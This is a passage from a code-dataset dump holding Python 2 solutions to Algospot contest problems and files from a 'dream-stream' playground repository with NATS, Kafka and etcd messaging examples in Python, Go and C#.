"num_lines": 48, "path": "/DECODE/DECODE.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef solve(r, c, s):\n pos = 0\n str_list = []\n direction = 0\n dir_list = [1, c,-1, -c]\n\n for i in xrange(r*c/5):\n one_char = 0\n for j in xrange(4,-1,-1):\n if s[pos] == \"1\":\n one_char += (1<<j)\n s[pos] = -1\n pos += dir_list[direction]\n need_change_dir = False\n\n # Case : Visit string at matrix outside\n if direction == 0 and pos == c:\n need_change_dir = True\n elif direction == 1 and pos == len(s)-1+c:\n need_change_dir = True\n # Case : Visit already visted string\n elif s[pos] == -1:\n need_change_dir = True\n\n if need_change_dir:\n pos -= dir_list[direction]\n direction = (direction+1)%4\n pos += dir_list[direction]\n\n str_list.append(one_char)\n\n ret = \"\"\n for c in str_list:\n if c == 0:\n ret += \" \"\n else:\n ret += chr(64+c)\n\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for i in xrange(int(rl())):\n input = rl().split()\n r, c = int(input[0]), int(input[1])\n print i+1, solve(r, c, list(input[2]))\n" }, { "alpha_fraction": 0.49368420243263245, "alphanum_fraction": 0.5442105531692505, "avg_line_length": 27.787878036499023, "blob_id": "454ade967ff12f7f0a79c8f0863cb8beefcfb85f", "content_id": "c7f0e016a5d1d3325bb249c94b86b76310bd4157", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 950, "license_type": "no_license", "max_line_length": 53, "num_lines": 33, "path": "/HANOI4/HANOI4_Unittest.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "test = __import__('HANOI4_Bit')\nimport unittest\nimport random\n\nclass Test_HANOI4(unittest.TestCase):\n def test_exam1(self):\n num = 5\n state = test.set_list(0, [1],0)\n state = test.set_list(state, [3],1)\n state = test.set_list(state, [5,4],2)\n state = test.set_list(state, [2],3)\n self.assertEqual(test.solve(num, state), 10)\n\n def test_exam2(self):\n num = 3\n state = test.set_list(0, [2],0)\n state = test.set_list(state, [3,1],2)\n self.assertEqual(test.solve(num, state), 4)\n\n def test_exam3(self):\n num = 10\n state = test.set_list(0, [8,7],0)\n state = test.set_list(state, [5,4],1)\n state = test.set_list(state, [6,3,2],2)\n state = test.set_list(state, [10,9,1],3)\n for _ in xrange(50):\n test.solve(num, state)\n self.assertEqual(test.solve(num, state), 24)\n\n\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.4479704797267914, "alphanum_fraction": 0.4723247289657593, "avg_line_length": 23.196428298950195, "blob_id": "81ea9e782c63ff4065b5c9270ba26787530a6b06", "content_id": "25e89e393385dfc8dca562e7d361648b2a73d217", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1355, "license_type": "no_license", "max_line_length": 70, "num_lines": 56, "path": "/PACKING/PACKING.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nN, W = None, None\nitems = None\ncache = None\n\ndef solve(n, capacity):\n if cache[n][capacity] != -1:\n return cache[n][capacity]\n\n if n == N:\n return 0\n\n ret = -1\n if capacity >= items[n][1]:\n ret = solve(n+1, capacity - items[n][1]) + items[n][2]\n\n ret = max(ret, solve(n+1, capacity))\n cache[n][capacity] = ret\n return ret\n\ndef reconstruct(n, capa, choose):\n if n == N:\n return\n\n if solve(n, capa) == solve(n+1, capa) :\n reconstruct(n+1, capa, choose)\n else:\n choose.append(items[n][0])\n reconstruct(n+1, capa-items[n][1],choose)\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n N, W = map(int, rl().split())\n items = [None]*N\n cache = [[-1]*1001 for _ in xrange(101)]\n for j in xrange(N):\n i = rl().split()\n items[j] = [i[0], int(i[1]), int(i[2])]\n\n needs = solve(0, W)\n choose = []\n n = 0\n w = W\n for i in xrange(N):\n if cache[i][w] - items[i][2] == cache[i+1][w-items[i][1]]:\n choose.append(items[i][0])\n n += 1\n w -= items[i][1]\n\n choose = []\n reconstruct(0, W, choose)\n print needs, len(choose)\n for name in choose:\n print name\n" }, { "alpha_fraction": 0.7324324250221252, "alphanum_fraction": 0.7351351380348206, "avg_line_length": 51.85714340209961, "blob_id": "907cd7a367dec064cd9181db09341eea3b942135", "content_id": "418d1b18d3d3525bdaf940a9b874b1743643521e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 838, "license_type": "no_license", "max_line_length": 84, "num_lines": 14, "path": "/README.md", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "# Algospot solution Repository\n\n- 짝이 맞지 않는 괄호(BRACKETS2) [[link](https://algospot.com/judge/problem/read/BRACKETS2)]\n- 캐나다 여행(CANADATRIP) [[link](https://algospot.com/judge/problem/read/CANADATRIP)]\n- 외계신호분석(ITES) [[link](https://algospot.com/judge/problem/read/ITES)]\n- 조세푸스 문제(JOSEPHUS)\n[[link](https://algospot.com/judge/problem/read/JJOSEPHUS)]\n- 도시락데우기(LUNCHBOX) [[link](https://algospot.com/judge/problem/read/LUNCHBOX)]\n- LIS (LIS) [[link](https://algospot.com/judge/problem/read/JLIS)]\n- 삼각형 위의 최대 경로(TRIANGLEPATH)\n[[link](https://algospot.com/judge/problem/read/TRIANGLEPATH)]\n- 와일드카드(WILDCARD) [[link](https://algospot.com/judge/problem/read/WILDCARD)]\n- 외발 뛰기(JUMPGAME)\n[[link](https://algospot.com/judge/problem/read/JUMPGAME)]\n" }, { "alpha_fraction": 0.45945945382118225, "alphanum_fraction": 0.4628378450870514, "avg_line_length": 25.909090042114258, "blob_id": "87cc609db4dad3427bc538ee1778c9366cc3808f", "content_id": "6e7013effb8d38c07c5e9c80194e42f0af326ef0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 296, "license_type": "no_license", "max_line_length": 58, "num_lines": 11, "path": "/HOTSUMMER/HOTSUMMER.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n target = int(rl())\n elec_sum = sum(map(int, rl().split()))\n if elec_sum <= target:\n print 'YES'\n else:\n print 'NO'\n" }, { "alpha_fraction": 0.3888888955116272, "alphanum_fraction": 0.4188034236431122, "avg_line_length": 20.9375, "blob_id": "f9d1eb8bfb88bca4bd27e416cdaa42c94cb9baf7", "content_id": "d2da1529ebee244aca7b26fc0efacc85f307bbb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 702, "license_type": "no_license", "max_line_length": 46, "num_lines": 32, "path": "/CONCERT/CONCERT.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nN = None\nVS = None\nVM = None\nVN = None\ncache = None\n\ndef solve():\n cache[0][VS] = 1\n for i in xrange(N):\n for j in xrange(VM+1):\n if cache[i][j] == 1:\n if 0 <= j + VN[i] <= VM:\n cache[i+1][j+VN[i]] = 1\n\n if 0 <= j - VN[i] <= VM:\n cache[i+1][j-VN[i]] = 1\n\n for i in xrange(VM,-1,-1):\n if cache[N][i] == 1:\n return i\n\n return -1\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n N, VS, VM = map(int, rl().split())\n VN = map(int, rl().split())\n cache = [[0]*1001 for _ in xrange(51)]\n\n print solve()\n" }, { "alpha_fraction": 0.408629447221756, "alphanum_fraction": 0.4796954393386841, "avg_line_length": 27.14285659790039, "blob_id": "ca8736641c8bd6255766274b20c6697e0c3d6f94", "content_id": "f241241b2eaf4cf0d8d885d42dea590d79216f5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 394, "license_type": "no_license", "max_line_length": 76, "num_lines": 14, "path": "/CONVERT/CONVERT.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nd = dict()\nd['kg'] = (2.2046, 'lb')\nd['lb'] = (0.4536, 'kg')\nd['l'] = (0.2642, 'g')\nd['g'] = (3.7854, 'l')\n\nif __name__ == \"__main__\":\n rl = lambda: sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for i in xrange(int(rl())):\n input = rl().split()\n digits, unit = float(input[0]), input[1]\n print i+1, \"{:.4f}\".format(round(digits * d[unit][0],4)), d[unit][1]\n" }, { "alpha_fraction": 0.4396226406097412, "alphanum_fraction": 0.4716981053352356, "avg_line_length": 25.5, "blob_id": "780c155840e92cb6eb09d3cf0155ffb082d6bf97", "content_id": "1b7789e629b3a7b7ee1e907fd45326328e391804", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 530, "license_type": "no_license", "max_line_length": 58, "num_lines": 20, "path": "/COINS/COINS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef solve(m, c, coins):\n cache = [0]*(m+1)\n\n for i, v in enumerate(coins):\n if v > m:\n break\n cache[v] += 1\n for j in xrange(coins[0],m-v+1):\n if cache[j] > 0:\n cache[j+v] += cache[j]\n return cache[m]\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n m, c = map(int, rl().split())\n coins = sorted(map(int, rl().split()))\n print solve(m, c, coins) % 1000000007\n" }, { "alpha_fraction": 0.3986850082874298, "alphanum_fraction": 0.4136282205581665, "avg_line_length": 36.17777633666992, "blob_id": "a3b7d0c921294c9bbf4e57ac0f2eda72839d7e13", "content_id": "06e2d06ffee0e95d8eea51b3ab8b751cd6c38cc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1673, "license_type": "no_license", "max_line_length": 81, "num_lines": 45, "path": "/MAGICPOWER/MAGICPOWER.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom collections import Counter\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n N, M = map(int, rl().split())\n\n items = Counter(map(int, rl().split()))\n index = list(sorted(items))\n ret = 0\n\n while M > 0:\n # Case : Remain only same value items (Rectangle graph)\n if len(index) == 1:\n if M > items[index[0]]*index[0]:\n ret += sum(range(index[0]+1))*items[index[0]]\n else:\n x,y = divmod(M, items[index[0]])\n ret += sum(range(index[0]-x+1, index[0]+1))*items[index[0]]\n ret += (index[0]-x) * y\n break\n \n # Case : Stepped graph\n # e.g) below shape\n # -\n # ----\n # ---\n else:\n n = len(index)-1\n # Calculate a highest value rectangle and then continue this work\n if M > items[index[n]]*(index[n]-index[n-1]):\n ret += sum(range(index[n-1]+1, index[n]+1))*(items[index[n]])\n M -= items[index[n]]*(index[n]-index[n-1])\n items[index[n-1]] += items[index[n]]\n del items[index[n]]\n del index[n]\n # Calculate remain M and then finish\n else:\n x,y = divmod(M, items[index[n]])\n ret += sum(range(index[n]-x+1, index[n]+1))*items[index[n]]\n ret += (index[n]-x) * y\n break\n\n print ret\n" }, { "alpha_fraction": 0.47130435705184937, "alphanum_fraction": 0.4886956512928009, "avg_line_length": 25.136363983154297, "blob_id": "94a0dff9591169304375060cc198feea11a39783", "content_id": "1805f55f2d1725bf1827d3c6b3bf7188b14d1c53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 575, "license_type": "no_license", "max_line_length": 63, "num_lines": 22, "path": "/FENCE/FENCE.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef solve(fences):\n stack = []\n ret = 0\n # stack = [(idx, value)]\n for cur, v in enumerate(fences):\n new_idx = cur\n while stack and stack[-1][1] >= v:\n ret = max(ret, stack[-1][1] * (cur - stack[-1][0]))\n new_idx = stack.pop()[0]\n stack.append((new_idx, v))\n\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n n = int(rl())\n fences = map(int, rl().split())\n fences.append(0)\n print solve(fences)\n" } ]
55
RoyElkabetz/Quine
https://github.com/RoyElkabetz/Quine
ec29918cee7bcfc312d025457c49cf7c57a07c39
c5d9c239f11c4bd9064c7eaf6487506a89f5b0bf
d5bc55d8e1b822e140af316bcb60d87ff37de02b
refs/heads/main
2023-08-22T05:38:52.005451
2021-09-27T13:39:34
2021-09-27T13:39:34
410,897,722
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4931972920894623, "alphanum_fraction": 0.5034013390541077, "avg_line_length": 13.292682647705078, "blob_id": "0443d0474534bbd085b8a3996234a8c7d46d6a03", "content_id": "a0de31f697283235640afae257f5856aef8f8d48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 588, "license_type": "no_license", "max_line_length": 52, "num_lines": 41, "path": "/README.md", "repo_name": "RoyElkabetz/Quine", "src_encoding": "UTF-8", "text": "# Quine\n\n[pyquine](pyquine.py) is a Quine written in Python. \n```python\n# This is a python quine\n# the variables\nq = chr(39)\nidx = 8\n \n \n# the string list\na = [\n'# This is a python quine',\n'# the variables',\n'q = chr(39)',\n'idx = 8',\n' ',\n' ',\n'# the string list',\n'a = [',\n']',\n' ',\n' ',\n'# the print',\n'for i in range(idx):',\n' print(a[i])',\n'for s in a:',\n' print(q + s + q + \",\")',\n'for i in range(idx, len(a)):',\n' print(a[i])',\n]\n \n \n# the print\nfor i in range(idx):\n print(a[i])\nfor s in a:\n print(q + s + q + \",\")\nfor i in range(idx, len(a)):\n print(a[i])\n```\n \n" }, { "alpha_fraction": 0.4715127646923065, "alphanum_fraction": 0.4833005964756012, "avg_line_length": 13.166666984558105, "blob_id": "3bdf96be73f153252ea0be2cd3ae70a72776d093", "content_id": "55448557e01e2ae4e43facaaf100382f6129e262", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 509, "license_type": "no_license", "max_line_length": 31, "num_lines": 36, "path": "/pyquine.py", "repo_name": "RoyElkabetz/Quine", "src_encoding": "UTF-8", "text": "# This is a python quine\n# the variables\nq = chr(39)\nidx = 8\n \n \n# the string list\na = [\n'# This is a python quine',\n'# the variables',\n'q = chr(39)',\n'idx = 8',\n' ',\n' ',\n'# the string list',\n'a = [',\n']',\n' ',\n' ',\n'# the print',\n'for i in range(idx):',\n' print(a[i])',\n'for s in a:',\n' print(q + s + q + \",\")',\n'for i in range(idx, len(a)):',\n' print(a[i])',\n]\n \n \n# the print\nfor i in range(idx):\n print(a[i])\nfor s in a:\n print(q + s + q + \",\")\nfor i in range(idx, len(a)):\n print(a[i])" } ]
2
dream-stream/PlayGround
https://github.com/dream-stream/PlayGround
6f5c009122026c1e67d60ee0f5da72c9f305f7a6
adf9760d6448d6571ef0e33eb86303c1b1ef7e98
9ca5145876da19abdcbbab2f52c02a0de78c4608
refs/heads/master
2020-07-12T18:34:05.965379
2019-12-30T14:39:58
2019-12-30T14:39:58
204,881,784
0
0
null
2019-08-28T08:14:46
2019-12-30T14:40:07
2020-01-31T18:05:33
C#
[ { "alpha_fraction": 0.6485148668289185, "alphanum_fraction": 0.6485148668289185, "avg_line_length": 19.200000762939453, "blob_id": "ca0b5cf3e9f3b35e85b0832429861288a2f042bd", "content_id": "4fa81f5454e09ba9c890425d451fc3092531d121", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 204, "license_type": "no_license", "max_line_length": 41, "num_lines": 10, "path": "/Deprecated Dream-Stream/Dream-Stream/Serialization/ISerializer.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using Dream_Stream.Models.Messages;\n\nnamespace Dream_Stream.Serialization\n{\n public interface ISerializer\n {\n byte[] Serialize<T>(T obj);\n T Deserialize<T>(byte[] message);\n }\n}\n" }, { "alpha_fraction": 0.4929041266441345, "alphanum_fraction": 0.5008653402328491, "avg_line_length": 30.07526969909668, "blob_id": "5d215eb23426a0b952a4be27246166ce7fd09b70", "content_id": "b16b7e2bb2fabe603eafa0ff12e9a2f8559da4c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2891, "license_type": "no_license", "max_line_length": 100, "num_lines": 93, "path": "/NatsStreaming/dotnet/Consumer/Consumer/Program.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using System;\nusing System.Diagnostics;\nusing System.Threading;\nusing STAN.Client;\n\nnamespace Consumer\n{\n internal class StanSubscriber\n {\n StanSubscriptionOptions _sOpts = StanSubscriptionOptions.GetDefaultOptions();\n\n private const int Count = 10000;\n private string _clientId = \"cs-subscriber\";\n private const string ClusterId = \"nats-streaming\";\n private const string Subject = \"foo\";\n private const string Url = \"nats://nats-cluster:4222\";\n private const bool Verbose = false;\n private int _received = 0;\n\n public void Run(string[] args)\n {\n _clientId += Guid.NewGuid();\n Banner();\n\n var opts = StanOptions.GetDefaultOptions();\n opts.NatsURL = Url;\n\n using var c = new StanConnectionFactory().CreateConnection(ClusterId, _clientId, opts);\n while (true)\n {\n _received = 0;\n var elapsed = ReceiveAsyncSubscriber(c);\n Console.Write(\"Received {0} msgs in {1} seconds \", _received, elapsed.TotalSeconds);\n Console.WriteLine(\"({0} msgs/second).\", (int)(_received / elapsed.TotalSeconds));\n }\n }\n\n private TimeSpan ReceiveAsyncSubscriber(IStanConnection c)\n {\n var sw = new Stopwatch();\n var ev = new AutoResetEvent(false);\n\n EventHandler<StanMsgHandlerArgs> msgHandler = (sender, args) =>\n {\n if (_received == 0)\n sw.Start();\n\n _received++;\n\n if (Verbose)\n {\n Console.WriteLine(\"Received seq # {0}: {1}\",\n args.Message.Sequence,\n System.Text.Encoding.UTF8.GetString(args.Message.Data));\n }\n\n if (_received >= Count)\n {\n sw.Stop();\n ev.Set();\n }\n };\n\n using (var s = c.Subscribe(Subject, _sOpts, msgHandler))\n {\n ev.WaitOne();\n }\n\n return sw.Elapsed;\n }\n\n private void Banner()\n {\n Console.WriteLine(\"Connecting to cluster '{0}' as client '{1}'.\", ClusterId, _clientId);\n Console.WriteLine(\"Consuming {0} messages on subject {1}\", Count, Subject);\n Console.WriteLine(\" Url: {0}\", Url);\n }\n\n public static void Main(string[] args)\n {\n try\n {\n new StanSubscriber().Run(args);\n }\n catch (Exception ex)\n {\n Console.Error.WriteLine(\"Exception: \" + ex.Message);\n if (ex.InnerException != null)\n Console.Error.WriteLine(\"Inner Exception: \" + ex.InnerException.Message);\n }\n }\n }\n}" }, { "alpha_fraction": 0.7330861687660217, "alphanum_fraction": 0.7562558054924011, "avg_line_length": 33.900001525878906, "blob_id": "31a78a420cc5d21e9504dda9a3022c0122c19602", "content_id": "44892f20a86b435a057da4937c2afe2626682960", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1081, "license_type": "no_license", "max_line_length": 141, "num_lines": 30, "path": "/Nats/Python/README.md", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "# NATS Python scripts\r\nNATS Python scripts contain an implementation of a Producer and Consumer.\r\n\r\nThe producer will publish three messages to the NATS server and the consumer will receive these three messages and write them in the console.\r\n\r\n## How to execute\r\nThis will be a step by step explanation on how to execute the scripts to see the described functionality.\r\n\r\n### Prerequirements\r\nBefore executing the scripts the following tools are required:\r\n- Python - 3.7.4\r\n- pip - 19.2.2\r\n- Docker - version 19.03.1, build 74b1e89\r\n\r\nThe version is the version installed on the computer where the scripts has been tested.\r\n\r\n### Step by step\r\nInstall the NATS docker image by running the following command:\r\n`docker run -d -p 4222:4222 nats`\r\n\r\nInstall the library for python:\r\n`pip install asyncio-nats-client`\r\n\r\nRun the Consumer.py by the following command:\r\n`python Consumer.py`\\\r\nThe Consumer will write to the console when it is ready to receive messages.\\\r\nTo stop the application again press 'enter'.\r\n\r\nRun the Producer in another terminal:\r\n`python Producer.py`\r\n\r\n" }, { "alpha_fraction": 0.6296296119689941, "alphanum_fraction": 0.6419752836227417, "avg_line_length": 14.428571701049805, "blob_id": "dc9751d0f6e87107483f4beb7eb32297d07c1cb8", "content_id": "02cc2df2fe5159552a8d2213207f66fef22bd7ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 324, "license_type": "no_license", "max_line_length": 47, "num_lines": 21, "path": "/Nats/Go/Publisher/Publisher.go", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"fmt\"\n\n\tnats \"github.com/nats-io/nats.go\"\n)\n\nfunc main() {\n\t// Connect to a server\n\tnc, _ := nats.Connect(\"localhost:4222\")\n\n\t// Simple Publisher\n\tfmt.Println(\"Publishing message: Hello World\")\n\t// Uncommented for message spam\n\t// for {\n\tnc.Publish(\"foo\", []byte(\"Hello World\"))\n\t// }\n\n\tnc.Close()\n}\n" }, { "alpha_fraction": 0.6608695387840271, "alphanum_fraction": 0.678260862827301, "avg_line_length": 23.64285659790039, "blob_id": "eaaa7c5a0307e951fa3bc44667280bff73461eeb", "content_id": "1010952002290213755248484b5f1211e7f95d0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 347, "license_type": "no_license", "max_line_length": 44, "num_lines": 14, "path": "/Deprecated Dream-Stream/Dream-Stream/Models/Messages/IMessage.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using MessagePack;\n\nnamespace Dream_Stream.Models.Messages\n{\n [Union(0, typeof(MessageContainer))]\n [Union(1, typeof(SubscriptionResponse))]\n [Union(2, typeof(SubscriptionRequest))]\n [Union(3, typeof(Message))]\n [Union(4, typeof(MessageHeader))]\n [Union(5, typeof(MessageRequest))]\n public interface IMessage\n {\n }\n}\n" }, { "alpha_fraction": 0.6064425706863403, "alphanum_fraction": 0.6162465214729309, "avg_line_length": 15.227272987365723, "blob_id": "ac4be9fd5eed10078493f332a303eafe175d7b09", "content_id": "dffeeadd463b9f15757f6c7b04270b9413d548d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 714, "license_type": "no_license", "max_line_length": 69, "num_lines": 44, "path": "/Nats/Go/Consumer/Consumer.go", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"fmt\"\n\t\"time\"\n\n\t\"github.com/eiannone/keyboard\"\n\t\"github.com/nats-io/nats.go\"\n)\n\nfunc main() {\n\tnc, _ := nats.Connect(\"localhost:4222\")\n\n\terr := keyboard.Open()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer keyboard.Close()\n\tcount := 0\n\t// Simple Async Subscriber\n\tsub, err := nc.Subscribe(\"foo\", func(m *nats.Msg) {\n\t\tcount++\n\t\tfmt.Printf(\"Received a message: %s %d\\n\", string(m.Data), count)\n\t})\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tfor {\n\t\ttime.Sleep(50 * time.Millisecond)\n\n\t\t_, key, err := keyboard.GetKey()\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t} else if key == keyboard.KeyEnter {\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// Drain - unsubscribes from a topic when there are no more messages\n\tsub.Drain()\n\n\tnc.Close()\n}\n" }, { "alpha_fraction": 0.6164383292198181, "alphanum_fraction": 0.6255707740783691, "avg_line_length": 23.38888931274414, "blob_id": "f6ee727526b921dd29498660ea436ea1e9e72408", "content_id": "55df050218d0ab5b11a3a5b9055031fb132ae70b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 438, "license_type": "no_license", "max_line_length": 49, "num_lines": 18, "path": "/Nats/Python/Producer.py", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "import asyncio\nfrom nats.aio.client import Client as NATS\n\nasync def run(loop):\n nc = NATS()\n\n await nc.connect(\"localhost:4222\", loop=loop)\n await nc.publish(\"foo\", b'Hello')\n await nc.publish(\"foo\", b'World')\n await nc.publish(\"foo\", b'!!!!!')\n\n # Terminate connection to NATS.\n await nc.close()\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run(loop))\n loop.close()" }, { "alpha_fraction": 0.5153294205665588, "alphanum_fraction": 0.5283757448196411, "avg_line_length": 35.5, "blob_id": "5b743663420c300002568398da99f55eb91364d0", "content_id": "6d1387ac0eef4c33b25315219aa4cbacf2bf4aba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1535, "license_type": "no_license", "max_line_length": 119, "num_lines": 42, "path": "/Kafka/dotnet/Producer/Producer/Program.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Threading.Tasks;\nusing Confluent.Kafka;\n\nnamespace Producer\n{\n class Program\n {\n public static async Task Main(string[] args)\n {\n Console.WriteLine(\"Starting Kafka Producer\");\n var list = new List<string>();\n for (var i = 0; i < 3; i++) list.Add($\"kf-kafka-{i}.kf-hs-kafka.default.svc.cluster.local:9093\");\n var bootstrapServers = string.Join(',', list);\n var config = new ProducerConfig { BootstrapServers = bootstrapServers };\n\n // If serializers are not specified, default serializers from\n // `Confluent.Kafka.Serializers` will be automatically used where\n // available. Note: by default strings are encoded as UTF8.\n using var p = new ProducerBuilder<Null, string>(config).Build();\n for (var i = 0; i < 200; i++)\n {\n try\n {\n var dr = await p.ProduceAsync(\"test-topic3\", new Message<Null, string> { Value = $\"Message {i}\" });\n Console.WriteLine($\"Delivered '{dr.Value}' to '{dr.TopicPartitionOffset}'\");\n }\n catch (ProduceException<Null, string> e)\n {\n Console.WriteLine($\"Delivery failed: {e.Error.Reason}\");\n }\n await Task.Delay(5000);\n }\n\n while (true)\n {\n await Task.Delay(1000);\n }\n }\n }\n}\n" }, { "alpha_fraction": 0.644859790802002, "alphanum_fraction": 0.6495327353477478, "avg_line_length": 18.454545974731445, "blob_id": "102c593fd252c30b01ac82a1488981d687e8dd95", "content_id": "ddf6d744d95256a604bb44fc4eb86ddc893b6970", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 216, "license_type": "no_license", "max_line_length": 48, "num_lines": 11, "path": "/Deprecated Dream-Stream/Dream-Stream/Models/Messages/SubscriptionResponse.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using MessagePack;\n\nnamespace Dream_Stream.Models.Messages\n{\n [MessagePackObject]\n public class SubscriptionResponse : IMessage\n {\n [Key(1)]\n public string TestMessage { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.8554216623306274, "alphanum_fraction": 0.8554216623306274, "avg_line_length": 40.5, "blob_id": "5714200590f9548add056ed78fa3107199d409b1", "content_id": "55a3302715246fb0a3de951494341ef98cba68db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 83, "license_type": "no_license", "max_line_length": 69, "num_lines": 2, "path": "/README.md", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "# PlayGround\nPlayGround for different technologies with relevance for Dream-Stream\n" }, { "alpha_fraction": 0.6064029932022095, "alphanum_fraction": 0.6082862615585327, "avg_line_length": 28.518518447875977, "blob_id": "af0f9a621e4558c04edfa71e2f8adc8418e0410e", "content_id": "a86d1b8d64b47702c083a6b06e36c0bf177c12ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1593, "license_type": "no_license", "max_line_length": 118, "num_lines": 54, "path": "/Deprecated Dream-Stream/Dream-Stream/Services/TopicList.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using System;\nusing System.Threading.Tasks;\nusing dotnet_etcd;\nusing Etcdserverpb;\nusing Mvccpb;\n\nnamespace Dream_Stream.Services\n{\n public class TopicList\n {\n private readonly EtcdClient _client;\n public const string Prefix = \"TopicList/\";\n private readonly string _me;\n\n\n public TopicList(EtcdClient client, string me)\n {\n _me = me;\n _client = client;\n }\n\n public async Task SetupTopicListWatch()\n {\n _client.WatchRange(Prefix, HandleTopicListWatch);\n var rangeResponse = await _client.GetRangeAsync(Prefix);\n HandleTopicListGet(rangeResponse);\n }\n\n private void HandleTopicListGet(RangeResponse rangeResponse)\n {\n foreach (var keyValue in rangeResponse.Kvs)\n {\n Task.Run(async () => await HandleElectionForKeyValue(keyValue));\n }\n }\n\n private async void HandleTopicListWatch(WatchResponse response)\n {\n foreach (var responseEvent in response.Events)\n {\n await HandleElectionForKeyValue(responseEvent.Kv);\n }\n }\n\n private async Task HandleElectionForKeyValue(KeyValue keyValue)\n {\n var topic = keyValue.Key.ToStringUtf8().Substring(Prefix.Length);\n\n var leaderElection = new LeaderElection(_client, topic, _me);\n await leaderElection.Election();\n Console.WriteLine($\"Handling Election for {keyValue.Key.ToStringUtf8()}:{keyValue.Value.ToStringUtf8()}\");\n }\n }\n}" }, { "alpha_fraction": 0.5739580392837524, "alphanum_fraction": 0.5769544839859009, "avg_line_length": 40.2471923828125, "blob_id": "7d043cbde23ac2c86e2275db3d8d9554573bab6b", "content_id": "e1ef07e0f83fd27eb9ed7366a1b3c894ea49f628", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 3673, "license_type": "no_license", "max_line_length": 174, "num_lines": 89, "path": "/Deprecated Dream-Stream/Dream-Stream/Services/MessageHandler.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Net.WebSockets;\nusing System.Threading;\nusing 